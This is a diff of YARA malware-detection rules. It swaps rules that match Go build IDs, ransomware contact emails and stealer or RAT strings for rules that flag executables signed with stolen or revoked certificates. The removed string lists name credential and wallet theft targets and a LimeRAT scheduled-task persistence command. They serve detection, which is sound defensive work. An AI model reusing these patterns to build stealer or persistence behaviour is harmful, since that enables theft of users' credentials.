-		logic_hash = "534de1ce161e5e27f380f96b83630aa75031f268658aa7e8ff8ecce82ed5d4cd"
+		logic_hash = "4ee7f3da2ae707517c1c426e6a73fdede51514e4ddf60b93fd77c1b6c23e82c0"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Go build ID: \"a3629ee6ab610a57f242f59a3dd5e5f6de73da40\"" ascii
+		thumbprint = "bd9cadcfb5cde90f493a92e43f49bf99db177724"
+		hash1 = "a4d9cf67d111b79da9cb4b366400fc3ba1d5f41f71d48ca9c8bb101cb4596327"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "S.O.M GmbH" and ( pe.signatures [ i ] . serial == "b3:96:9c:d6:b2:f9:13:ac:c9:9c:3f:61:fc:14:85:2f" or pe.signatures [ i ] . serial == "00:b3:96:9c:d6:b2:f9:13:ac:c9:9c:3f:61:fc:14:85:2f" ) )
 }
-rule DITEKSHEN_INDICATOR_KB_Gobuildid_Hive : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0D83E7F47189Cdbfc7Fa3E5F58882329 : FILE
 {
 	meta:
-		description = "Detects Golang Build IDs in Hive ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "7d7f7757-de7b-52a7-aab0-8fda38a86fd1"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		id = "6574aab4-f307-53c2-8cf7-bcc7565facc8"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1645-L1653"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4621-L4632"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f311a3661ea3a26ebca6cd283d1e219011acfdfbb13fa8b919ca2724b9f4aae7"
+		logic_hash = "c4dffcad286e161980ccec2188459b8b7eaf0e982c7c69ca5ffbaf8e4d85d1b4"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Go build ID: \"XDub7DGmWVQ2COC6W4If/XHMqRPf2lnJUiVkG1CR6/u_MaUU0go2UUmLb_INuv/WrZSyz-WMW1st_NaM935\"" ascii
+		thumbprint = "ba4bf6d8caac468c92dd7cd4303cbdb2c9f58886"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THE WIZARD GIFT CORPORATION" and pe.signatures [ i ] . serial == "0d:83:e7:f4:71:89:cd:bf:c7:fa:3e:5f:58:88:23:29" )
 }
-rule DITEKSHEN_INDICATOR_KB_Gobuildid_Nodachi : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_008385684419Ab26A3F2640B1496E1Fe94 : FILE
 {
 	meta:
-		description = "Detects Golang Build IDs in Nodachi"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "9d578768-7995-5fb0-8bf1-9c2221cdef80"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		id = "5aa92ac6-241f-54a1-b828-f8a5deb6d212"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1655-L1666"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4634-L4645"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "177269623e0f3850c37c6b203d9a637fa92c0ed3fa823cc8d885f28cb383bf7d"
+		logic_hash = "7c9de438d5c7156052e30ce70310aaa989ff1896f7b34ffc6c4fd8fc2bc60b85"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Go build ID: \"3AAyhKK0wFfCYLdz5oRV/zKyiBHCsAEyDIWhaW5AW/Rb8NLT3q8A2OLm6izDGP/8G9k_gjOTX_PXKna_IMj\"" ascii
-		$s2 = "Go build ID: \"-eyFd8kbpwxUsutpqZn_/vqzQXX5Ra4qk1XHoqocW/wd-6gLzQKZyEyhVp7qOj/Jr14hyc7pLLgeIZNbfLD\"" ascii
-		$s3 = "Go build ID: \"xDSqp4KGmd0SAf5irMGh/-kA7PGjKoJcvCgsZDStn/lHeQ1LQOVyQB2NnwIwFP/-D5oEBc23ND7IGLTESdM\"" ascii
-		$s4 = "Go build ID: \"67RcwNspLH__QJrElMcB/zMJf7Go1s0ZoXqd30Lb_/NaJl4rfcuLEG5LeZ-Y4k/MzFNvW79enRRdx3LmA47\"" ascii
+		thumbprint = "ee1d7d90957f3f2ccfcc069f5615a5bafdac322f"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CAUSE FOR CHANGE LTD" and pe.signatures [ i ] . serial == "00:83:85:68:44:19:ab:26:a3:f2:64:0b:14:96:e1:fe:94" )
 }
-rule DITEKSHEN_INDICATOR_KB_Gobuildid_Gobrut : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_1Aec3D3F752A38617C1D7A677D0B5591 : FILE
 {
 	meta:
-		description = "Detects Golang Build IDs in GoBrut"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "65953012-fc84-50d0-b769-64df66d8a54b"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		id = "8e1bb307-733c-5626-98f6-a5c2587bf800"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1668-L1676"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4647-L4658"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "40c305f019cb31222fa75a24315764cb5e5356afaa72aefb59916d615a8fca28"
+		logic_hash = "4bbe5aac8a470061abab48070fafd2100c577cab1f40fcc5924dbd13bc747487"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Go build ID: \"sf_2_ylcjquGBe4mQ99L/aPvdLbM2z9HfoDN3RazG/8bhYeVA67N-ifbDYCDJe/UZzCu_EFL9f10gSfO4L0\"" ascii
+		thumbprint = "1d41b9f7714f221d76592e403d2fbb0f0310e697"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SILVER d.o.o." and pe.signatures [ i ] . serial == "1a:ec:3d:3f:75:2a:38:61:7c:1d:7a:67:7d:0b:55:91" )
 }
-rule DITEKSHEN_INDICATOR_KB_Gobuildid_Biopassdropper : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_E5B2Af04Ea4B84A94609A47Eba3164Ec : FILE
 {
 	meta:
-		description = "Detects Golang Build IDs in BioPass dropper"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "b82d34d9-7774-5f99-9d76-b5426e015981"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		id = "ea78ae13-cd9f-578a-95e4-906ab7045faf"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1678-L1686"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4660-L4671"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3b586e886b9f901dde1c73aa07ce0d45e4ff417459f298094359ec1c1e02e522"
+		logic_hash = "2e32bb0d9689625cd860a75539961410241de341ad4b7ee661df7d3b2dd47c46"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Go build ID: \"OS0VlkdEIlcl3WDDr9Za/_oVwEipaaX6V4mEEYg2V/PytlyeIYgV65maz4wT2Y/IQvgbHv3bbLV42i10qq2\"" ascii
+		thumbprint = "7785d50066faee71d1a463584c1a97f34431ddfe"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RRGRQJRWZHRTLFAUVK" and pe.signatures [ i ] . serial == "e5:b2:af:04:ea:4b:84:a9:46:09:a4:7e:ba:31:64:ec" )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Rhysida
+
+rule DITEKSHEN_INDICATOR_KB_CERT_Dummy01 : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with Rhysida ransomware"
-		author = "ditekShen"
-		id = "7ee0fb41-9267-5b65-ada3-229f2e390da6"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "eaf3bbdd-72b4-513c-9a5b-04f16292fa00"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1688-L1697"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4673-L4687"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e3e07bab2982a30a5372e6708ede6707d132d410aa5b5b1a29bdb5d06910a88e"
+		logic_hash = "c72ac977ef92feead0a7ec72ec99b1a11f20b8c5258a08842a4dceddff91d659"
 		score = 75
-		quality = 71
-		tags = ""
-
-	strings:
-		$s1 = "SethZemlak@onionmail.org" ascii wide nocase
-		$s2 = "JacquieKunze@onionmail.org" ascii wide nocase
+		quality = 75
+		tags = "FILE"
+		thumbprint1 = "16b7eb40b97149f49e8ec885b0a7fa7598f5a00f"
+		thumbprint2 = "902bf957b57f134619443d80cb8767250e034110"
+		thumbprint3 = "505f0055a66216c81420f41335ea7a4eb7b240fe"
+		thumbprint4 = "c05a6806d770dcec780e0477b83f068a1082be06"
+		importance = 20
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Dummy certificate" and pe.signatures [ i ] . serial == "01" )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Payola
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00A7E1Dc5352C3852C5523030F57F2425C : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with Payola ransomware"
-		author = "ditekShen"
-		id = "7c1fc06b-fc71-5679-befd-686b2e05e3a4"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "fba8f1a8-ca08-5d6f-a83e-c817daf94703"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1699-L1708"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4689-L4700"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "568141c03d14faef0cfc4f5fbdec45a5109a1ad5cbbe99e76a1db86e7ef4dc5d"
+		logic_hash = "06c151ae8b4a45eccef028ea69f0adf74445bd4d871fc65cc1d308f2005cede1"
 		score = 75
-		quality = 71
-		tags = ""
-
-	strings:
-		$s1 = "pcsupport@skiff.com" ascii wide nocase
-		$s2 = "pctalk01@tutanota.com" ascii wide nocase
+		quality = 75
+		tags = "FILE"
+		thumbprint = "09232474b95fc2cfb07137e1ada82de63ffe6fcd"
+		importance = 20
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Pushka LLC" and pe.signatures [ i ] . serial == "00:a7:e1:dc:53:52:c3:85:2c:55:23:03:0f:57:f2:42:5c" )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Xorist
+
+rule DITEKSHEN_INDICATOR_KB_CERT_635517466B67Bd4Bba805Bc67Ac3328C : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with Xorist ransomware"
-		author = "ditekShen"
-		id = "151d182c-c60a-54dd-a3d2-b32d27521b57"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "b7533186-b5dc-53ce-912b-39bd42c92071"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1710-L1723"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4702-L4713"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5975a730ad1a1f7e54e95ec5897aa2940ccc3ed1aa8e83b38cb7ac836c233208"
+		logic_hash = "71cdb314e2f6bda70f9f627d72aea49290fdbce66f76a170aa6571873ca82860"
 		score = 75
-		quality = 67
-		tags = ""
-
-	strings:
-		$s1 = "@root_backdoor_synaptics_V" ascii wide nocase
-		$s2 = "@DosX_Plus" ascii wide nocase
-		$s3 = "@Cinoshi_Adm" ascii wide nocase
-		$s4 = "@ac3ss0r" ascii wide nocase
-		$s5 = "MCwRK1Z7K4GYHt9ZrbTR2SMCEqzqQaTbRF" ascii wide
-		$s6 = "0x334F093c9De6552AF4cC0B252dA82aC77FeB467D" ascii wide
+		quality = 75
+		tags = "FILE"
+		thumbprint = "0b3144ec936028cbf5292504ef2a75eea8eb6c1d"
+		importance = 20
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MEDIATEK INC." and pe.signatures [ i ] . serial == "63:55:17:46:6b:67:bd:4b:ba:80:5b:c6:7a:c3:32:8c" )
 }
-rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Blackhunt
+
+rule DITEKSHEN_INDICATOR_KB_CERT_A2253Aeb5B0Ff1Aecbfd412C18Ccf07A : FILE
 {
 	meta:
-		description = "Detects files referencing identities associated with BlackHunt ransomware"
-		author = "ditekShen"
-		id = "87613fcc-7d9a-57ba-9653-c48760dd5ef0"
-		date = "2021-01-21"
-		modified = "2024-01-23"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "82d70dae-97e7-5fa3-8a91-de6143fa2164"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L1725-L1739"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4729-L4740"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6b875d4abdedc8032f89ab3cbdf4acdc855d83b5bcc08f96b2fbc38b4a5daa7f"
+		logic_hash = "357de1cbdf3223dfb1a920bfb15bbbd66906de5225c0ed015e5a3fbbbb65a753"
 		score = 75
-		quality = 61
-		tags = ""
-
-	strings:
-		$s1 = "onion746@onionmail.com" ascii wide nocase
-		$s2 = "amike1096@gmail.com" ascii wide nocase
-		$s3 = "decryptyourdata@msgsafe.io" ascii wide nocase
-		$s4 = "decryptyourdata@onionmail.org" ascii wide nocase
-		$s5 = "Teikobest@gmail.com" ascii wide nocase
-		$s6 = "Loxoclash@gmail.com" ascii wide nocase
-		$s7 = "://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion" ascii wide nocase
+		quality = 75
+		tags = "FILE"
+		thumbprint = "b03db8e908dcf0e00a5a011ba82e673d91524816"
+		importance = 20
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Gallopers Software Solutions Limited" and pe.signatures [ i ] . serial == "a2:25:3a:eb:5b:0f:f1:ae:cb:fd:41:2c:18:cc:f0:7a" )
 }
-rule DITEKSHEN_MALWARE_Win_Laturo : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_21E3Cae5B77C41528658Ada08509C392 : FILE
 {
 	meta:
-		description = "Laturo information stealer payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "221a1ee8-e1ae-558c-919c-e3f55c1500f0"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "bd97478f-1b75-542d-814c-8d318d745240"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3-L26"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4742-L4753"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "bfb0c5676c926f58a4395a56dad09b37e8ac1cf0bf6b5521767c16698644b73a"
+		logic_hash = "c860e888b19b98c40cf00babfb022a79a35f12def0077733e796b2aeeea324ea"
 		score = 75
-		quality = 61
+		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.Laturo"
-
-	strings:
-		$str1 = "cmd.exe /c ping 127.0.0.1" ascii wide
-		$str2 = "cmd.exe /c start" ascii wide
-		$str3 = "\\RapidLoader\\" ascii
-		$str4 = "loader/gate.php" ascii wide
-		$str5 = "Hwid:" ascii wide
-		$str6 = "Special:" ascii wide
-		$str7 = "logs=%s" ascii
-		$data1 = "cookies.%u.txt" nocase ascii wide
-		$data2 = "passwords.%u.txt" nocase ascii wide
-		$data3 = "credentials.%u.txt" nocase ascii wide
-		$data4 = "cards.%u.txt" nocase ascii wide
-		$data5 = "autofill.%u.txt" nocase ascii wide
-		$data6 = "loginusers.vdf" ascii wide
-		$data7 = "screenshot.bmp" nocase ascii wide
-		$data8 = "webcam.bmp" nocase ascii wide
+		thumbprint = "8acfaa12e5d02c1e0daf0a373b0490d782ea5220"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of ( $str* ) and 1 of ( $data* )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Network Design International Holdings Limited" and pe.signatures [ i ] . serial == "21:e3:ca:e5:b7:7c:41:52:86:58:ad:a0:85:09:c3:92" )
 }
-rule DITEKSHEN_MALWARE_Win_Xpertrat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_09B3A7E559Fcb024C4B66B794E9540Cb : FILE
 {
 	meta:
-		description = "XpertRAT payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "cea7de47-b47c-5fea-96ee-5858b16cca8d"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "5e1057d4-a40c-5e48-8965-91fd533c04dc"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L28-L56"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4790-L4802"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2a521bd1d6ce16fa16aa7757db2657dcab15e6802454ad899906d4ed17401feb"
+		logic_hash = "345abbb31986fe3f8f6b7eb05c73d4d42daa9df6a7706b9cd2fb4f8aac61d40b"
 		score = 75
-		quality = 63
+		quality = 75
 		tags = "FILE"
-		snort_sid = "920003-920006"
-		clamav_sig = "MALWARE.Win.Trojan.XpertRAT"
-
-	strings:
-		$v1 = "[XpertRAT-Mutex]" fullword wide
-		$v2 = "XPERTPLUGIN" fullword wide
-		$v3 = "+Xpert+3." wide
-		$v4 = "keylog.tmp" fullword wide
-		$v5 = "\\TempReg.reg" fullword wide
-		$s1 = "ClsKeylogger" fullword ascii nocase
-		$s2 = "clsCamShot" fullword ascii nocase
-		$s3 = "ClsShellCommand" fullword ascii nocase
-		$s4 = "ClsRemoteDesktop" fullword ascii nocase
-		$s5 = "ClsScreenRemote" fullword ascii nocase
-		$s6 = "ClsSoundRemote" fullword ascii nocase
-		$s7 = "MdlHidder" fullword ascii
-		$s8 = "modKeylog" fullword ascii
-		$s9 = "modWipe" fullword ascii
-		$s10 = "modDelProcInUse" fullword ascii
-		$s11 = "Socket_DataArrival" fullword ascii
-		$s12 = "cZip_EndCompress" fullword ascii
+		thumbprint = "59c60ade491c9eda994711b1fdb59510baad2ea3"
+		hash1 = "b57d694b6d1f9e0634953e8f5c1e4faf84fb50be806a8887dd5b31bfd58a167f"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 3 of ( $v* ) or 6 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Windscribe Limited" and pe.signatures [ i ] . serial == "09:b3:a7:e5:59:fc:b0:24:c4:b6:6b:79:4e:95:40:cb" )
 }
-rule DITEKSHEN_MALWARE_Win_Isrstealer : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_19Beff8A6C129663E5E8C18953Dc1F67 : FILE
 {
 	meta:
-		description = "ISRStealer payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "d6c3acdd-e881-5f97-8856-b7b60f56a1c2"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "8bc27a0c-898d-510f-ad9d-78d5bab40cad"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L112-L128"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4804-L4815"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5dd030ab8122b5dd432168647c7a3465cb3593a326f68b4863a91d16587641e5"
+		logic_hash = "e62c4ab0652f872887b7bedadba3306c831351f57bc4a177302b1268d823f9f4"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.ISRStealer"
-
-	strings:
-		$s1 = "&password=" wide
-		$s2 = "&pcname=" wide
-		$s3 = "MSVBVM60.DLL" ascii
-		$s4 = "MSVBVM60.DLL" wide
-		$s5 = "Core Software For : Public" wide
-		$s6 = "</Host>" wide
-		$s7 = "</Pass>" wide
-		$s8 = "/scomma" wide
+		thumbprint = "ad3deacd821fee3bb158665bd7fa491e39aab2e6"
+		importance = 20
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 4000KB and 6 of them ) or all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CULNADY LTD LTD" and pe.signatures [ i ] . serial == "19:be:ff:8a:6c:12:96:63:e5:e8:c1:89:53:dc:1f:67" )
 }
-rule DITEKSHEN_MALWARE_Win_Limerat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0Cf2D0B5Bfdd68Cf777A0C12F806A569 : FILE
 {
 	meta:
-		description = "LimeRAT payload"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "a4b85cad-97a8-514c-9380-f3e8ec95a44d"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "610f4147-9b32-5d96-bf27-10a8e0c3c347"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L152-L168"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4817-L4828"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8ae35c5fa48773b93da0b76b238fc8dbaf19fdeb6fd81bf23842c5121d620116"
+		logic_hash = "d3e625c05e974650bb9750f6dadbbba5825a34ea10902c807b9da457902d2b59"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr" wide
-		$s2 = "\\vboxhook.dll" fullword wide
-		$s3 = "Win32_Processor.deviceid=\"CPU0\"" fullword wide
-		$s4 = "select CommandLine from Win32_Process where Name='{0}'" wide
-		$s5 = "Minning..." fullword wide
-		$s6 = "Regasm.exe" fullword wide
-		$s7 = "Flood!" fullword wide
-		$s8 = "Rans-Status" fullword wide
-		$s9 = "cmd.exe /c ping 0" wide
+		thumbprint = "0c212cdf3d9a46621c19af5c494ff6bad25d3190"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PROTIP d.o.o." and pe.signatures [ i ] . serial == "0c:f2:d0:b5:bf:dd:68:cf:77:7a:0c:12:f8:06:a5:69" )
 }
-rule DITEKSHEN_MALWARE_Win_Arkei : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_56F008E69A7C4C3Feb389C66Eaf58259 : FILE
 {
 	meta:
-		description = "Detect Arkei infostealer variants"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "d32a27bf-abb9-553c-9913-d675c340a5c5"
-		date = "2020-11-06"
-		modified = "2024-11-01"
+		id = "bcd0cd8e-82ec-5d20-85d1-cbad455b6d90"
+		date = "2020-11-19"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L210-L226"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4830-L4841"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8a79bcc6ac94900c8a8913b2e81424bf900bbac416f44a91db6f208f23980155"
+		logic_hash = "3ba02eb734b461b02744c5fc901e45f4574249607398fb8a73850d5d5e89788b"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "C:\\Windows\\System32\\cmd.exe" fullword ascii wide
-		$s2 = "/c taskkill /im " fullword ascii
-		$s3 = "card_number_encrypted FROM credit_cards" ascii
-		$s4 = "\\wallet.dat" ascii
-		$s5 = "Arkei/" wide
-		$s6 = "files\\passwords." ascii wide
-		$s7 = "files\\cc_" ascii wide
-		$s8 = "files\\autofill_" ascii wide
-		$s9 = "files\\cookies_" ascii wide
+		thumbprint = "a7dc8cb973ef5f54af0889549d84dee51a7db839"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MEDIATEK INC." and pe.signatures [ i ] . serial == "56:f0:08:e6:9a:7c:4c:3f:eb:38:9c:66:ea:f5:82:59" )
 }
-rule DITEKSHEN_MALWARE_Win_Obliquerat : FILE
+
